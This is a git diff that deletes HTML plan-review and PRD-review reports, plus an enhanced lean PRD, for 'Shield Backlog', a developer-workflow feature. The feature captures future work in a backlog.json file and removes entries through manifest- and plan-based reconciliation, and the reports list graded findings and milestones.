EPIC-1-S3 · /backlog view — ordered list (high)

-

/backlog command + skill rendering entries sorted by order with feature + epic + source.

-
    -
  • Tasks: author shield/commands/backlog.md + backlog/SKILL.md; render sorted; define render-line format once; document a provably non-destructive local-dev/dry-run loop; empty-backlog message. -
      -
    • [P2 — security] Dry-run/fixture mode MUST force the lazy sweep off (the sweep runs on every real view) so testing a fixture can't mutate the project store.
    • -
    -
  • -
  • AC: ascending-order list with feature/epic/source; clean empty message; command registered; dry-run mode runs no sweep against the project store.
  • -
  • Design: TRD §4 Product Journey
  • -
-

EPIC-1-S4 · Manual remove from /backlog (medium)

-

/backlog remove <id> — plain delete.

-
    -
  • Tasks: remove <id> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (uncommitted manual remove is unrecoverable by design — N4).
  • -
  • AC: deletes + persists atomically; absent id = clear no-op error; no history retained.
  • -
  • Design: TRD §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-
-

EPIC-2 — Association & pipeline status (EPIC-2 deliberately straddles M1/M2 — see note)

-
-

[P2 — agile] EPIC-2-S1 (status badges) ships with the M1 view; EPIC-2-S2 (association + suggestion) is the M2 deliverable. This straddle is intentional, not a numbering slip.

-
-

EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)

-
    -
  • Tasks: read manifest; render status badges; pin badge string research ✓ prd ✓ plan –; not started when feature absent; compute at view time. -
      -
    • [P0-1 — fix] Read against the pinned manifest contract (see TRD §11 addition): manifest.json = {schema_version, features:[{name, artifacts:{research,prd,plan_json,...}}]} — a list keyed by name, plan_json is a boolean flag, no plan path stored.
    • -
    -
  • -
  • AC: badges derived from the pinned manifest shape; prd-but-no-plan shows prd ✓ plan – and stays; absent feature → not started.
  • -
  • Design: TRD §7 High-Level Design
  • -
-

EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)

-
    -
  • Tasks: prompt/accept feature + epic (allow proposed-new); LOCKED exact-normalized match (casefold() + collapsed ws); suggest by scanning manifest + candidate plan.json; never block capture; tie → surface all, auto-pick none. -
      -
    • [P0-1 — fix] suggest_feature(text, *, manifest) and suggest_epic(text, *, feature, plans) are typed against the real shapes: manifest.features[].name; plans is dict[feature-slug → parsed plan.json], the path derived as docs/shield/<slug>/plan.json for features with artifacts.plan_json == true.
    • -
    • [P1-3 — fix] suggest_feature returns features[].name, which is the folder slug (invariant pinned in EPIC-1-S1).
    • -
    -
  • -
  • AC: every entry has feature + epic; ≥1 feature + ≥1 epic candidate when matches exist; auth fixture surfaces auth top candidate + 2-way tie auto-picks neither; a suggested feature value resolves to an existing docs/shield/<value>/ path; capture succeeds proposed-new when none.
  • -
  • Design: TRD §5 Functional Requirements · LLD epic-suggester §5 API contracts
  • -
-
-

EPIC-3 — Promotion & reconciliation (M3)

-

EPIC-3-S1 · User-driven promotion with transient reference (high)

-

/backlog promote <id> launches the user-chosen step and passes the entry id as a transient runtime reference — never stamped into plan.json (F6).

-
    -
  • AC: promotion starts the chosen step + forwards the reference; reference not persisted (F6); tool never auto-routes.
  • -
  • Design: TRD §4 Product Journey
  • -
-
-

Intra-epic dependency: EPIC-3-S3 consumes EPIC-3-S1 + EPIC-3-S2 and lands after both.

-
-

EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)

-

Locate feature in manifest.json; if it has a plan.json, apply the single "epic landed" predicate (F8).

-
    -
  • Tasks: shield/scripts/reconcile_backlog.py; never-remove-on-doubt; drift tolerance with logged warning; log every removal {entry id, feature, epic, match-kind, triggering run, gating plan.json path}. -
      -
    • [P0-2 — fix] Match key: existing epic by normalized name (NOT by EPIC-N id — ids are positional slots reassigned on every re-/plan, so id-matching breaks across re-plans). Proposed-new also by normalized name. EPIC-N is only a within-one-plan disambiguator. Story status never consulted.
    • -
    • [P0-1 — fix] reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -> RemovalDecisionmanifest is the parsed {schema_version, features:[...]}; plans maps feature-slug → parsed plan.json (path derived, not stored). Define the RemovalDecision dataclass carrying the F9 log fields [P2].
    • -
    -
  • -
  • AC: removed only when an epic with normalized-exact name is present in plan.json.epics[] (story status not consulted); prd-only not removed; epic-name collision across two features → ambiguous → stays; an epic reordered across a re-plan still resolves correctly; malformed/old shapes → stays (logged), no exception; every removal emits the structured log line.
  • -
  • Design: TRD §7 High-Level Design · LLD reconciler §6 Sequence flows
  • -
-

EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch (high)

-

Eager prune at end of promoted /plan//implement; lazy sweep on view. Both idempotent; both call the one engine. Lands after S1 + S2.

-
    -
  • Tasks: eager prune hook; lazy sweep; idempotent remove-if-present + shared engine; debug-gated latency line. -
      -
    • [P0-3 — fix] Extend shield/schemas/shield.schema.json with an optional backlog object ({auto_reconcile: bool, default true}) + a config example — the current schema has additionalProperties: false, so the kill switch fails validation without this. (Reflected in the EPIC-4-S2 version bump.)
    • -
    • [P1-1 (agile/sre) — fix] Resolve the N4 recovery OR: v1 default = .shield/backlog-removed.log (append the entry before the destructive remove); commit-before-prune is an explicit non-goal. Update TRD §6 N4 + §14 step 2 to name the single mechanism.
    • -
    • [P2 — sre] Drop "independently" (one coupled boolean); surface "N entries removed since last view (see backlog-removed.log)" on view; define the removed-log lifecycle (gitignored, append-only, manual rotation); specify "no-op prune emits no log line"; state the N2 WARN threshold (">1s").
    • -
    -
  • -
  • AC: eager prune removes the referenced entry at end of run; lazy sweep removes plan-committed entries; second pass is a no-op (idempotent); shared engine; backlog.auto_reconcile=false (now schema-valid) disables both; an end-of-run prune appends to .shield/backlog-removed.log before the remove; replaying the log restores the entry; debug latency line reports view+sweep wall time.
  • -
  • Design: TRD §7 High-Level Design · LLD reconciler §8 Concurrency & state
  • -
-
-

EPIC-4 — Eval coverage & release (M3)

-

EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)

-
    -
  • Tasks: fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays via epic-name collision, malformed-stays, re-planned-epic-reorder-still-resolves, manifest-from-real-schema); evals for each behavior incl. duplicate-id rejection. -
      -
    • [P1-1 — fix] Concurrency eval asserts detection: a concurrent on-disk change between read and replace is refused (BacklogInvalid), no lost entry — not a race the design forbids.
    • -
    • [P1 (security P1-b) — fix] Write-side eval: capture() producing a schema-invalid doc raises BacklogInvalid and leaves backlog.json byte-unchanged (no .tmp promoted).
    • -
    • [P1 (security P1-c) — fix] Recovery-rehearsal eval asserts recoverability across a crash at the ordering seam (after log-append/before remove).
    • -
    • no-stamping eval (F6): plan.json + story records byte-unchanged after promotion.
    • -
    • [P1 / DX P1 — fix] Name the concrete CI entrypoint (the actual workflow file + runner under shield/evals/ or .github/workflows/), not a task; path-filter glob shield/{schema,scripts,skills/general/backlog}/**, shield/commands/backlog.md.
    • -
    -
  • -
  • AC: suite covers all listed behaviors (incl. compare-before-replace detection, write-side refusal, ordering-seam recovery, re-plan epic-reorder); self-contained (no API/LLM); PR body has RED + GREEN; named CI runner runs on the glob.
  • -
  • Design: TRD §10 Milestones
  • -
-

EPIC-4-S2 · Version bump + command/skill docs (medium)

-
    -
  • Tasks: bump marketplace.json + backlog_store pyproject.toml (now unconditional per P1-4); finalize command/skill docs (capture, three triggers, kill switch, match key, manual remove, badges, wrong-removal recovery procedure); commit the shield.schema.json backlog change (P0-3); document a fixed audit interval + numeric trigger (PRD §7 thresholds); explicit DoD lines; CHANGELOG. -
      -
    • [P2 — PM] Add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); add coarse effort/impact per milestone (PM4); quantify the v1-audit target (PM10).
    • -
    -
  • -
  • AC: version bumped in same commit (incl. schema change); SKILL.md documents capture/view/promote/remove + 3 triggers + kill switch + audit cadence + recovery procedure; explicit DoD lines present; CHANGELOG mentions the feature.
  • -
  • Design: TRD §13 References
  • -
-
-

Carried forward + validate-the-bet

-
    -
  • The prior PRD-review carry-forwards (capture interface, schema_version, drift tolerance, idempotency) remain folded (EPIC-1-S1/S2, EPIC-3-S2/S3).
  • -
  • PM10 decision unchanged: ship M1, validate the bet from backlog.json's 30-day git history before investing in M2/M3.
  • -
-

Next steps

-
    -
  • Fold the 3 P0s (+ the P1s) in one editing pass on TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S2/S3, EPIC-1-S1/S2, EPIC-4-S1/S2. No story restructuring needed.
  • -
  • Re-run /plan-review to confirm the P0s clear, then /pm-sync and /implement from M1.
  • -
- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html deleted file mode 100644 index d955a64a..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html +++ /dev/null @@ -1,206 +0,0 @@ - - - - - -Review — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Plan Review — Shield Backlog (backlog-20260527)

-

Date: 2026-05-29 · Run: 1 · Source PRD: prd.md (type: lean) · Plan: plan.md + trd.md + plan.json (schema 1.5) -Reviewers: dx-engineer, agile-coach, backend-engineer, sre, security-engineer, product-manager (PM1–PM10)

-
-

✅ Resolution (applied 2026-05-29): the user chose "Apply P0+P1 to the plan." All 3 P0 and 8 P1 findings have been folded into the canonical artifacts (plan.json, trd.md, the 3 LLD drafts) and shield/schemas/shield.schema.json (additive backlog object). Re-validation: validate_plan.py ✅, validate_trd.py ✅ (milestone-drift clean), kill-switch .shield.json validates ✅, all 3 LLD drafts structurally ✅. The plan is now clear for /implement. See plan.json metadata.plan_review_2026_05_29.{p0_applied,p1_applied} for the per-finding trace. The findings below are retained as the review record.

-
-

Verdict: Ready — composite 3.49 (B+) ⚠️ (3 P0 + 8 P1 since applied — see Resolution above)

-

The re-plan is a clear improvement on the prior run (3.14 → 3.49): the deferred TRD landed, schema is 1.5, and the prior P0 (gate-0d duplication) + the SRE/Security P1 set are verifiably folded in. However, the backend reviewer — checking the design against the live Shield schemas rather than only against itself — surfaced 3 P0 contract defects that each break a core path at implementation time. The weighted composite lands in "Ready" range, but the P0s gate /implement. All three are localized contract-pinning fixes, not design rework.

-

Scorecard

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PersonaWeightGradeNumeric
DX Engineer1.0A−3.7
Backend Engineer1.0B−2.7
Security Engineer1.0A−3.7
Agile Coach0.7A−3.7
SRE / Operations0.7A−3.7
Product Manager (PM1–PM10 avg)0.7A3.6
CompositeB+3.49 → Ready
-

PM dim grades: PM1 A · PM2 A · PM3 A · PM4 B · PM5 B · PM6 B · PM7 A · PM8 A · PM9 A · PM10 B → avg 3.6.

-

Deterministic gates (run before dispatch)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
GateResult
0a schema (validate_plan.py)✅ exit 0
0b TRD sections (validate_trd.py)✅ exit 0 (incl. milestone-drift)
0c stale anchors✅ none
0d PRD↔TRD duplication (§2/§5)✅ 6-char / 3-char overlap (≤80) — prior P0 resolved
0e impl-manual (§7 fence >20 lines)⚠️ §7 ASCII diagram is 27 lines, but §8 has 5 populated alternatives → escape satisfied (not P0)
0f touches_lld_drift
0g lld_components_integrity
0h undocumented_lldn/a — no canonical docs/lld/ (all net-new)
0i lld_draft_review (3 drafts)✅ all 14 always-on + 8 forced subsections present, no vague TBDs
-

P0 — Blockers (fix before /implement)

-

All three independently verified against live schemas (shield/schemas/{shield,plan}.schema.json, docs/shield/manifest.json).

-
    -
  1. Reconciler/suggester contracts don't match the real manifest.json/plan.json shapes (backend P0-1). manifest.json is {schema_version, features:[{name, artifacts:{…plan_json: bool…}, reviews, updated}]} — a list keyed by name, with a boolean plan_json flag and no stored plan path. reconcile(entry, *, manifest, plans) (lld-reconciler §5) never defines plans and never says the path must be derived. Fix: pin the real shapes; define plans: dict[slug→plan] populated by reading docs/shield/<feature>/plan.json for each feature with artifacts.plan_json == true; add a fixture from the actual manifest schema. (Also covers DX P1 manifest read-contract.)
  2. -
  3. Existing-epic matching keys off a positional slot, not an identity (backend P0-2). Epic ids are EPIC-N slugs assigned by /plan (EPIC-2 = different epics in different plans, verified). After any re-/plan, an existing-epic entry stamped EPIC-2 matches the wrong epic or rots. Fix: match existing epics by normalized name too (same predicate as proposed-new); treat EPIC-N only as a within-one-plan disambiguator; add a "epic reordered across a re-plan" eval.
  4. -
  5. Kill switch backlog.auto_reconcile is unshippable under the current .shield.json schema (backend P0-3). shield.schema.json has additionalProperties: false and no backlog key; adding the flag fails validation, and no story includes the schema change. Fix: add a task+AC (EPIC-3-S3, version-bump in EPIC-4-S2) extending shield.schema.json with an optional backlog object ({auto_reconcile: bool, default true}) + config example. Without it the documented first-line rollback (TRD §14) cannot ship.
  6. -
-

P1 — Should fix for plan quality

-
    -
  1. Resolve the EPIC-3-S3 N4 recovery OR (agile AC7 + sre P1-1). AC5 encodes "commit-before-prune or removed-log" — not writable as one test, and the §14 runbook can't be precise. Pick one v1 default (recommend .shield/backlog-removed.log — avoids forcing a possibly-dirty-tree commit on every prune, decouples recovery from git state mid-/implement); make the other a non-goal.
  2. -
  3. Add lost-update detection (compare-before-replace) (backend P1-1 + security P1-a). The concurrency eval tests a race the single-writer design forbids, and N5, if silently violated, yields a silent lost update. Have capture()/remove() carry the schema_version+entry-count (or mtime/hash) read at start and refuse os.replace() if the file changed underneath — a loud BacklogInvalid instead of a lost entry, no lockfile. Then the eval tests a real, detectable behavior.
  4. -
  5. Reword "schema rejects duplicate id" → validator (backend P1-2). JSON Schema 2020-12 can't express property-level array uniqueness; F2 + EPIC-1-S1 AC must say validate_backlog.py enforces it (duplicate_entry_id).
  6. -
  7. Pin the feature name == folder-slug invariant (backend P1-3). suggest_feature returns manifest features[].name, but the reconciliation key is the folder slug; if they differ, suggestion proposes an unresolvable value. Document the invariant + add a "suggested value resolves to an existing docs/shield/<value>/" fixture.
  8. -
  9. Resolve the packaging model (backend P1-4). F3 ("every capturing skill builds against this signature") implies an importable module; EPIC-4-S2 hedges. Decide at plan time — package backlog_store with a pyproject.toml so the version bump is unconditional; document the import path skills use.
  10. -
  11. Resolve the CI entrypoint to a concrete value (dx P1). EPIC-4-S1 still phrases the runner as a task; name the actual workflow file + runner so the eval-gate AC is verifiable.
  12. -
  13. Add a write-side validation eval (security P1-b). "validate-or-refuse on read/write" is asserted but only read-side + crash-mid-write are tested. Add: capture() producing a schema-invalid doc raises BacklogInvalid and leaves backlog.json byte-unchanged.
  14. -
  15. Test the recovery ordering seam (security P1-c). Strengthen the recovery-rehearsal eval to assert recoverability across a crash between log-append and remove (and between remove and commit), not just after a clean wrong-removal.
  16. -
-

P2 — Nice to have

-
    -
  • DX: fixed audit interval + numeric trigger (not "e.g. monthly"); state runtime prereqs (Python/uv, pydantic+jsonschema) once in SKILL.md; label the 3.12 (PRD-review) vs 3.14 (plan-review) composites inline.
  • -
  • Agile: consider splitting EPIC-3-S3 into S3a (triggers) + S3b (kill switch + recovery + latency); note EPIC-2 deliberately straddles M1/M2; state the N2 WARN threshold (">1s").
  • -
  • SRE: drop "independently" from the kill-switch description (it's one coupled boolean); add a "N entries removed since last view" notice so wrong-removals aren't pull-only; define the removed-log lifecycle (tracked vs gitignored, rotation); require the wrong-removal recovery procedure in SKILL.md; specify no-op-prune logging.
  • -
  • Backend: add os.fsync() + a unique .tmp suffix; consider read() -> BacklogDoc (pydantic) over raw dict; define the RemovalDecision dataclass (the F9 log fields).
  • -
  • Security: give .shield/backlog-removed.log a schema/parser + tracked-status decision; make dry-run/fixture mode provably non-destructive (force sweep off) + eval it; add a forward note that a future migrate() must be validate-or-refuse.
  • -
  • PM: add coarse effort/impact per milestone (PM4); add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); quantify the operational cost the tool recovers as a falsifiable v1-audit target (PM10).
  • -
-

Detailed agent findings

- -

Recommendation

-

The plan is Ready in substance — strong scope discipline, testable ACs, an acyclic milestone DAG, clean trust boundaries, and an honest threat model. But do not start /implement until the 3 P0 contract fixes land: they are the difference between a plan that reads consistently and one whose reconciler, epic-matching, and kill switch actually work against the real Shield artifacts. The P1s (recovery-mechanism choice, lost-update detection, packaging) are best folded in the same revision pass. Estimated effort: one focused editing pass on the TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S3, and EPIC-4-S1/S2 — no story restructuring required.

- -
-
Generated by Shield
- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html deleted file mode 100644 index d2253360..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html +++ /dev/null @@ -1,316 +0,0 @@ - - - - - -Shield PRD Review - - - -
Shield PRD Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/prd/2026-05-27/)
-

Shield Backlog

- -

1. Header

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
FieldValue
Owner@ashwinimanoj
StatusDraft
PRD typeLean
Date created2026-05-27
Last updated2026-05-27
Linked design specnull
Linked researchnull
Decision-maker@ashwinimanoj
Sign-off contacts(n/a for internal tooling)
Linked plans(auto-populated by /plan)
- -

2. Terminologies

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TermDefinition
BacklogA project-level, ordered list of future work captured across the Shield workflow. Lives at docs/shield/backlog.json.
Backlog entryOne captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a source (user | agent), and a feature + epic association (either may be proposed-new until promotion).
Feature associationThe feature an entry belongs to (a docs/shield/<feature>/ folder). It is the reconciliation key: manifest.json is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.
Epic associationThe epic an entry slots into when planned — an existing epic id (e.g. EPIC-2) or a proposed new epic. Acts as the gate at reconciliation: the entry is removed only when this epic's work appears in the feature's plan.json.
PromotionActing on a backlog entry by starting the appropriate Shield step for it — /research, /prd, /plan, or /implement. The user decides which step; the backlog does not auto-route.
ReconciliationKeeping the backlog current: manifest.json locates the entry's feature and whether it has a plan.json; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's plan.json (epics[].stories[]). No ids are stamped — matching is by feature (manifest) + epic (plan). A prd-only feature does not trigger removal.
Agent-discovered entryA backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).
- - -

3. Problem & context

-

Future work surfaces constantly while using Shield — during /research, while writing a PRD, mid-/plan, and especially during /implement ("we should also handle X later", "this whole area needs a rewrite"). Today there is nowhere to park that work. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.

- -

Concretely:

-
    -
  • There is no project-level, ordered place to capture "not now, but later" items. plan.json only holds work already committed to a milestone; manifest.json is an artifact index. Neither captures un-triaged future work.
  • -
  • Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.
  • -
  • When future work is remembered, there's no consistent path from "loose idea" to "stories in a plan." Each pickup re-derives the epic, the feature, and the scope from scratch.
  • -
- -

Why now: Shield's pipeline (/research → /prd → /plan → /implement) is mature, but it only handles work that's already been decided on. The gap is the staging area before that pipeline — where future work waits, ordered, until the user promotes it in.

- -

4. Target users / personas

- - - - - - - - - - - - - - - - - - - - - - - -
IDPersonaGoalsFrictions today
P1Developer/PM driving ShieldCapture future work without losing focus on the current task; come back later to an ordered list of what to pick up nextFuture ideas get lost or derail the current task; no ordered "later" list at the project level
P2The agent (Claude) running a Shield taskRecord follow-up work it discovers mid-task so the human doesn't have to remember itDiscovered work is mentioned once in chat then forgotten; no place to persist it
- -

5. Architecture & flows

-

A single global store docs/shield/backlog.json (sibling to manifest.json), a /backlog command to view it, a capture path usable from any Shield skill or by the user, and a user-driven promotion: the user picks an entry and starts whichever Shield step fits — /research, /prd, /plan, or /implement. Each entry carries an order, a source (user | agent), and a feature + epic association. Reconciliation reads manifest.json as the project-level index — to find each entry's feature, see whether it has a plan.json, and surface its pipeline status (research/prd/plan) in the /backlog view — then opens the flagged plan.json and removes any entry whose epic's work now appears there. A prd-only feature stays in the backlog; only plan-committed work is removed. No ids are tracked.

- - -
flowchart LR
-  cap["Capture<br/>(user or agent, anytime)"] --> bl["backlog.json<br/>(ordered, project-level)"]
-  bl --> view["/backlog<br/>(ordered list +<br/>per-entry pipeline status)"]
-  man["manifest.json<br/>(feature index:<br/>research/prd/plan)"] --> view
-  bl --> dec{"User decides<br/>next step"}
-  dec --> research["/research"]
-  dec --> prd["/prd"]
-  dec --> plan["/plan"]
-  dec --> impl["/implement"]
-  man --> rec["Reconcile:<br/>epic's work in feature's plan.json<br/>→ remove from backlog"]
-  plan --> rec
-  rec --> bl
-
-

6. Goals & non-goals

-

Goals

-
    -
  • Capture future work (epic / story / task granularity) at any point in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.
  • -
  • Support both capture sources: user-created and agent-discovered.
  • -
  • Keep the backlog ordered so there's a clear "what to pick up next."
  • -
  • Every entry is associated with a feature and an epic — existing or proposed-new — and the agent suggests a matching feature/epic at capture or promotion time.
  • -
  • A /backlog command shows the current backlog, ordered, with each entry's feature + epic association, source, and pipeline status (research / prd / plan, read from manifest.json) — so you can see what's been started (e.g. a prd written) without the entry being removed.
  • -
  • Provide a user-driven promotion path: the user picks an entry and starts the Shield step they judge appropriate (/research, /prd, /plan, or /implement). The backlog suggests, but does not dictate, the next step.
  • -
  • Keep the backlog current: when an entry's work appears in a feature's plan.json, the entry is removed automatically, so the backlog reflects only not-yet-planned work.
  • -
- -

Non-goals

-
    -
  • Automatic end-of-task surfacing machinery (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.
  • -
  • Per-feature backlogs. v1 is a single global backlog.
  • -
  • A status/workflow engine. The lifecycle is minimal: an entry exists in the backlog until its work lands in a plan.json, at which point it is removed. No multi-state machine.
  • -
  • Syncing the backlog to the PM tool (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing /pm-sync on the resulting plan.
  • -
  • Replacing the PM tool's own backlog. This is Shield-local triage, not a project-management backlog of record.
  • -
- -

7. Success metrics

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
MetricTypeTargetCounter
Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rotOutcomeMajority of entries reach a terminal state (promoted/landed in a plan, or explicitly dropped) rather than rottingEntries pile up un-triaged → backlog becomes a graveyard
Entries carrying a feature + epic association at promotion timeQuality100% — promotion cannot complete without a feature and epicForcing association makes capture so heavy nobody captures
Agent feature/epic-suggestion acceptanceQualitySuggested feature/epic accepted often enough to save manual lookupBad suggestions that users routinely override
Capture frictionAdoptionCapturing an entry mid-task takes one step and does not interrupt the current taskCapture is so quick the backlog fills with low-signal noise
- - -

8. Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameOutcomeExit criteriaDepends on
M1Capture + store + viewA global backlog.json exists; entries can be added (user + agent) with order, source, and feature + epic association; /backlog shows the ordered list with per-entry pipeline status from manifest.jsonbacklog.json schema defined; an entry can be captured from a skill or by the user; /backlog renders the ordered backlog with feature + epic and a research/prd/plan status read from manifest.json
M2Feature + epic association + suggestionEvery entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epicCapture prompts for a feature + epic; agent scans manifest.json features and known epics and proposes a match; user can accept, pick another, or create-newM1
M3Promotion + reconciliationThe user picks an entry and starts the Shield step they choose (/research, /prd, /plan, or /implement); once the entry's epic's work appears in the feature's plan.json, it is removed from the backlogReconciliation uses manifest.json (find feature, has-plan?) + plan.json (epic present?) — no ids stamped; a prd-only feature is not removed; /backlog reconciles on view; the user-chosen step is never overriddenM2
- - -

9. Open questions

- -
    -
  • Feature/epic discovery scope. manifest.json lists features (the reconciliation key). Epics still live inside per-feature plan.json files, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged plan.json files; revisit if a project-level epic index is ever needed.)
  • -
  • Reconciliation matching (resolved): no ids are stamped. An entry references a feature (matched against manifest.json) and an epic (confirmed in that feature's plan.json). The entry is removed only once its epic's work appears in the plan — a prd-only feature is not removed. Open: does reconciliation run on /backlog view, at the end of /plan, or both? (Leaning: on /backlog view, since the user drives promotion.)
  • -
- -
    -
  • Ordering scheme. Single global rank (explicit integer order, like orderindex), priority buckets (P0/P1/P2), or both? (Leaning: explicit order field for v1.)
  • -
  • Entry granularity. The ask says "epics/stories/tasks." Do we model a kind field, or treat every entry uniformly as "future work that becomes ≥1 story on promotion"? (Leaning: a kind hint, but promotion always yields stories.)
  • -
  • Dropped/rejected entries. Do we need an explicit terminal state for "decided against," or is deleting the entry enough? (Deferred — see Out of scope.)
  • -
- -

10. Out of scope / Non-goals

-
    -
  • Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).
  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • A rejected/dropped lifecycle state and the audit trail for declined ideas.
  • -
  • /pm-sync of backlog entries to the PM tool before promotion.
  • -
  • Cross-project / multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).
  • -
- -
-
-

This is a lean PRD. It intentionally omits the following standard sections:

-
    -
  • Section 8 — User stories & scenarios
  • -
  • Section 9 — Functional requirements
  • -
  • Section 10 — Non-functional requirements
  • -
  • Section 11 — RBAC & permissions matrix
  • -
  • Section 12 — Dependencies
  • -
  • Section 13 — Risks & mitigations
  • -
  • Section 14 — Assumptions
  • -
  • Section 15 — Rollout plan (full — lean has its own §8 Milestones)
  • -
  • Section 16 — Cost & resource impact
  • -
  • Section 17 — GTM & customer-comms
  • -
  • Section 18 — Support / CX impact
  • -
-

If scope grows or stakeholders need more detail, run /prd again — Shield -will offer to add specific sections or upgrade to standard.

-
- - - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html deleted file mode 100644 index fdaf2b5a..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html +++ /dev/null @@ -1,241 +0,0 @@ - - - - - -Review — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

PRD Review — Shield Backlog

-

Source: docs/shield/backlog-20260527/prd.md (snapshot: source-prd.md) -PRD type: Lean (confirmed) · Date: 2026-05-27 · Reviewers: 13 dispatches (9 PM dims + agile-coach + tech-lead + dx-engineer + finops-analyst)

-

Verdict: Needs Work (composite 2.7, blocked by 1 P0)

-

Strong, well-scoped lean PRD with an unusually clean conceptual model (manifest = reconciliation key, epic = removal gate, no ids). It's held back by one Critical gap (no risks/assumptions treatment) and a cluster of consistency issues — several introduced by the recent rapid edits (the reconciliation trigger and "automatically" wording).

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PersonaWeightGradeNotes
product-manager (dims 1,2,3,7,8,11,12)1.0C (2.17)dim 1 & 12 drag it down
agile-coach (dim 4)1.0B (3.0)happy-path-only coverage
tech-lead (dims 5,6)1.0Informationallean-exempt (real NFR notes below)
dx-engineer (anti-patterns)0.7B (3.0)found edit-induced contradictions
finops-analyst (dim 13)0.7N/Ainternal tool, no cost surface
Composite2.69≥2.5 but P0-gated → Needs Work
-

Per-dimension grades

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DimNameGradeDimNameGrade
1Problem clarityD8Legal/privacyN/A
2Scope boundariesB9GTMinformational
3Measurable successC10Support/CXinformational
4Scenario coverage & ACB11Why nowC
5NFR coverageinformational12Risks & assumptionsD
6Rollout & opsinformational13Costinformational
7RACI & approvalsA
-
-

P0 — must fix before /plan (1)

-

P0-1 · Dim 12a · Risks & assumptions (Critical, F). No risks section: failure modes appear only as §7 counter-metrics, with no mitigations or named owners, and no validated/unvalidated assumptions framing. -→ Add a short lean risks table — each risk + mitigation + owner — and an assumptions list. The load-bearing unvalidated assumption is the whole no-hooks bet: "agents reliably surface follow-ups conversationally." Mitigations mostly already exist (reconciliation-on-view → graveyard risk; atomic write → corruption).

-

P1 — should fix for quality (8)

-
    -
  • P1-1 · Dim 1b (Important, F). Problem stated with zero baseline numbers. → Add one figure, e.g. "~N follow-ups lost across the last M /implement runs."
  • -
  • P1-2 · Dim 1a (Critical, C). Personas are role categories, not a named persona. → Name P1 concretely (e.g. "Ashwini, Shield maintainer running /implement daily").
  • -
  • P1-3 · Dim 3a (Critical, C). Three of four metrics use vague targets ("Majority", "often enough", "one step"). → Attach numbers + a time horizon (e.g. "≥70% reach a terminal state within 30 days").
  • -
  • P1-4 · Dim 3d (Warning, F). No tracking owner/cadence for the metrics. → Name how it's measured (e.g. periodic /backlog audit, or git history of backlog.json).
  • -
  • P1-5 · Dim 11a/11b (Critical/Important, C). Why-now describes a standing gap, not a concrete trigger; cost-of-inaction unquantified. → Anchor to a real recent instance of lost follow-up work.
  • -
  • P1-6 · Dim 12b (Important, D). No validated-vs-unvalidated assumptions split. → See P0-1 fix.
  • -
  • P1-7 · Dim 4a (Critical, C) + 4b (Important, C). Flows are happy-path only; edge cases (missing plan.json, abandoned capture, concurrent writes to the single global backlog.json, two features sharing an epic id) unaddressed. → Add ≥1 error path per core flow; resolve the ordering-collision open question.
  • -
  • P1-8 · DX / matching rule (P1). With ids removed, the PRD never says how a proposed-new epic name is matched to the eventual real epic in plan.json — this is the central removal-correctness decision and is left implicit. → Specify the match key (string match? user-confirmed at promotion?).
  • -
-

